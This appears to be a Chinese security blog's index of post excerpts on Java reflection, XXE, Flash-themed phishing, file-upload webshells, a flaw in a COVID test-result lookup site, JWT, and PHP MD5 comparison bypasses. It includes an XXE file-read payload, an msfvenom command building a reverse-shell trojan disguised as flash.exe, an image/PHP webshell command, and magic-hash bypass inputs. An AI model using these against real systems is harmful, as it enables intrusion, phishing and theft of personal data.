2022-10-08

Java反射总结

反射中的方法

public void execute(String className, String methodName) throws Exception {
	Class clazz = Class.forName(className);
	clazz.getMethod(methodName).invoke(clazz.newInstance());
}

获取类的方法

forName、obj.getClass()
实例化类对象的方法

newInstance
获取函数的方法

getMethod
执行函数的方法

invoke

2022-09-25

XXE漏洞总结

XML外部实体注入漏洞。

XXE-Lab for PHP

读取文件

<?xml version="1.0"?>
<!DOCTYPE Mikasa [
<!ENTITY test SYSTEM  "file:///d:/dorvin.txt">
]>
<user><username>&test;</username><password>dorvin</password></user>

2022-09-21

通过Flash进行钓鱼

tip：本文只讨论钓鱼技术，未实现免杀。

制作木马

msfvenom

1	msfvenom -p windows/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=6666 -f exe > flash.exe

2022-09-16

通过文件上传Getshell思路

图片马生成

1	copy demo.png/b+shell.php shell.png

MIME

MIME(Multipurpose Internet Mail Extensions)多用途互联网邮件扩展类型，可用来检测上传文件的类型。通过修改HTTP包中的Content-Type中的值即可绕过，如Content-Type: image/png。

2022-09-15

某核酸检测信息查询平台的漏洞发现

最近我在的城市疫情有点严重，连续被捅了8次嗓子，在某次查询核酸结果的时候，我发现了查询网站好像不那么安全，于是开始了研究。

漏洞发现

在查询核酸检测结果时，发现每次请求的API参数是相同的，并且请求无需通过验证。那么，这里的验证码很可能只有前端验证，后端并没有进行验证，并且加密算法是固定的。只要知道是如何加密的，就可以直接通过身份证号查询到公民信息。

2022-08-30

JWT中的安全隐患

JWT特征

JWT生成的token由.连接的三段字符串组成，即{HEADER}.{PAYLOAD}.{SIGNATURE}。

HEADER

HEADER是对算法和token类型进行base64Url加密。如以下JSON对应的HEADER为eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9，这是token的第一部分。
1
2
3
4
{
"alg": "HS256",
"typ": "JWT"
}

2022-08-29

PHP过滤函数缺陷

==与===

==不比较类型，===比较类型。
md5
1
2
3
4
5
if($_GET['name'] != $_GET['password']) {
if(MD5($_GET['name']) == MD5($_GET['password'])) {
echo $flag;
}
}
- 科学计数法
  
  如果一个字符串为合法数字+e+合法数字类型，将会解释为科学计数法的浮点数。
  
  那么只要找到字符串的MD5值为0e开头的，即可绕过。如：name=QNKCDZO&password=240610708。
  
  但是这种方法只能在==情况下绕过，因为===是会比较类型，而MD5函数返回的是字符类型，无法转换成数字。
- 数组
  
  md5函数无法处理数组，如果传入的为数字，会返回NULL。如：name[]=1&password[]=2。这种绕过在===的情况下也可以使用。